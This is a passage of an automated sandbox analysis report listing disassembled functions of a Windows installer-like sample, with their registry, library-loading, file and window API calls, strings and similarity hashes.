                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048217D
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004821A0
                                                                                                                                                          Strings
                                                                                                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048214A
                                                                                                                                                          • CSDVersion, xrefs: 00482174
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                                                          • API String ID: 3677997916-1910633163
                                                                                                                                                          • Opcode ID: f017cad2ed831413fc80ac0a9559e600e41906ea6a01450b0a6b9b0332386435
                                                                                                                                                          • Instruction ID: 234b749f7f851cfbfd5644349c5fd5927c737282cf1b30e82c7fcc64daf3ae2d
                                                                                                                                                          • Opcode Fuzzy Hash: f017cad2ed831413fc80ac0a9559e600e41906ea6a01450b0a6b9b0332386435
                                                                                                                                                          • Instruction Fuzzy Hash: 1CF03675E40209B6DF10EAD08D49B9F73BCAB05704F604567EE10E7280E7B89A448759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00458B84 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                                                          • API String ID: 47109696-2631785700
                                                                                                                                                          • Opcode ID: 1a33b2fff3c7ae31bce977b9663c7c724be55f04a92ed0b102073ff14c86d074
                                                                                                                                                          • Instruction ID: 6d8b28394c42fe518be87e1bc96ea370ff989b9669e1d7f51fc18c3a52dee8f8
                                                                                                                                                          • Opcode Fuzzy Hash: 1a33b2fff3c7ae31bce977b9663c7c724be55f04a92ed0b102073ff14c86d074
                                                                                                                                                          • Instruction Fuzzy Hash: 78F0A4B1704110ABD710EB1AE845F5A629CDB91356F20503FF581EB292CE7CDC068AAA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042D8BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531CA,00000000,0045326D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453539,00000000), ref: 0042D8D6
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                                                          • API String ID: 1646373207-4063490227
                                                                                                                                                          • Opcode ID: 0314162b0ce3b3db5bac818b6afbefaed119cc9b0d2b55ba021accdda3190316
                                                                                                                                                          • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                                                                                                          • Opcode Fuzzy Hash: 0314162b0ce3b3db5bac818b6afbefaed119cc9b0d2b55ba021accdda3190316
                                                                                                                                                          • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E9C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                                                                          • API String ID: 1646373207-260599015
                                                                                                                                                          • Opcode ID: cf3e5377d2a5d653984701c19945938778551e2571298e4db392a1f8e4a5fdad
                                                                                                                                                          • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                                                                                                          • Opcode Fuzzy Hash: cf3e5377d2a5d653984701c19945938778551e2571298e4db392a1f8e4a5fdad
                                                                                                                                                          • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00497030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                                                                          • API String ID: 1646373207-834958232
                                                                                                                                                          • Opcode ID: e625468a081321e78befee22b7a2c2891f0201f6f4b774c15ed5751cb50e9a32
                                                                                                                                                          • Instruction ID: 452f54a6037127921152cef0656c2e9433c36e1ae577bdfae3f91b34ce646964
                                                                                                                                                          • Opcode Fuzzy Hash: e625468a081321e78befee22b7a2c2891f0201f6f4b774c15ed5751cb50e9a32
                                                                                                                                                          • Instruction Fuzzy Hash: F9B002D16E9701D4DD2032F20D57E1F0C484C4076575515777414F51C7FD6DD9045A7D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00463E1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                                                                                            • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                          • API String ID: 2238633743-2683653824
                                                                                                                                                          • Opcode ID: 719beb51feb1838192f6b60fe2ba0343982b08ecb80bdea613c2e6589c1835f4
                                                                                                                                                          • Instruction ID: 7d58e33019c036ad457fb907f94f1e4e419ce3fd113c1db0310001010c17eb6a
                                                                                                                                                          • Opcode Fuzzy Hash: 719beb51feb1838192f6b60fe2ba0343982b08ecb80bdea613c2e6589c1835f4
                                                                                                                                                          • Instruction Fuzzy Hash: 28B092A0A80780A8DE10BFB3A843A0B28048590B1A720403B302479083EB7E85145E7F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047C458 Relevance: 6.2, APIs: 4, Instructions: 194fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,?,00000000,?,0047C871), ref: 0047C5A4
                                                                                                                                                          • FindClose.KERNEL32(000000FF,0047C5CF,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,?,00000000,?,0047C871,00000000), ref: 0047C5C2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2066263336-0
                                                                                                                                                          • Opcode ID: ad80c70025ab8b1a502d284fc4c36093cde674e045d6ff12e82b6a20ac10d9ad
                                                                                                                                                          • Instruction ID: 9cbd629fba0131c534336b548e2a3d064dbd11d36534118a4e528ca36bdac333
                                                                                                                                                          • Opcode Fuzzy Hash: ad80c70025ab8b1a502d284fc4c36093cde674e045d6ff12e82b6a20ac10d9ad
                                                                                                                                                          • Instruction Fuzzy Hash: 56813F7090025DAFCF11DF95CC91ADFBBB9EF49304F5080AAE418A7291D7399A46CF58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047469C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                                                                                            • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00474811,?,?,0049B178,00000000), ref: 004746FA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CountErrorFileLastMoveTick
                                                                                                                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                                          • API String ID: 2406187244-2685451598
                                                                                                                                                          • Opcode ID: 14c72f99d3db5737e79d2ecf786cd78e52585d1ffa8f95a38f55a0f121dc5fc7
                                                                                                                                                          • Instruction ID: e9099c621665a946f5b0db8f2b3318fd5b54847bcac127bf4feb9123ba8a5391
                                                                                                                                                          • Opcode Fuzzy Hash: 14c72f99d3db5737e79d2ecf786cd78e52585d1ffa8f95a38f55a0f121dc5fc7
                                                                                                                                                          • Instruction Fuzzy Hash: 19417674A002198FCB10EFA5D882AFE77B4EF89314F518537E414B7391D73C9A058BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00413D56
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                                                                                            • Part of subcall function 00418ED0: 6F5BC6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                                                                                            • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                                                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorDesktopWindow$Show
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2074268717-0
                                                                                                                                                          • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                                                                                          • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                                                                                                          • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                                                                                          • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LoadString$FileMessageModuleName
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 704749118-0
                                                                                                                                                          • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                                                                                          • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                                                                                                          • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                                                                                          • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044E118 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                                                                                            • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                                                                                            • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                                                                          • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                                                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 855768636-0
                                                                                                                                                          • Opcode ID: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
                                                                                                                                                          • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                                                                                                          • Opcode Fuzzy Hash: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
                                                                                                                                                          • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00493F88 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00493FEC
                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494007
                                                                                                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494021
                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 0049403C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: OffsetRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 177026234-0
                                                                                                                                                          • Opcode ID: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
                                                                                                                                                          • Instruction ID: 6ea8699f142f5b744308f5fb49fe63af15150726bd9fdc74535c03b54fc39d6b
                                                                                                                                                          • Opcode Fuzzy Hash: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
